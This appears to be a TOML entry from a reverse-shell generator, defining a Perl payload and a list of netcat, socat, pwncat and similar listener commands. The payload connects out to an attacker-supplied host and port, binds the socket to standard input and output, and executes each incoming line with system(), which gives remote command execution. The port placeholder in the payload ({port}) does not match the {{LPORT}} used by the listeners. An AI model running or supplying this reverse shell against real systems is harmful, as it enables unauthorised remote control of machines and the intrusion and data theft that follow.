id = "perl_no_sh"
name = "Perl (no sh)"
os = "unix"
type = "reverse"
proto = "tcp"
lang = "perl"
description = "Uses Perl's IO::Socket to connect back to the target host and port. The socket is bound directly to standard IO, then each incoming line is executed with system() instead of spawning an interactive shell process."

payload = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{{LHOST}}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"

[listeners]
nc = "nc -lvnp {{LPORT}}"
nc_freebsd = "nc -lvn {{LPORT}}"
busybox_nc = "busybox nc -lp {{LPORT}}"
ncat = "ncat -lvnp {{LPORT}}"
ncat_exe = "ncat.exe -lvnp {{LPORT}}"
rlwrap_nc = "rlwrap -cAr nc -lvnp {{LPORT}}"
rustcat = "rcat listen {{LPORT}}"
pwncat = "python3 -m pwncat -lp {{LPORT}}"
socat = "socat -d -d TCP-LISTEN:{{LPORT}} STDOUT"
socat_tty = "socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}}"
powercat = "powercat -l -p {{LPORT}}"
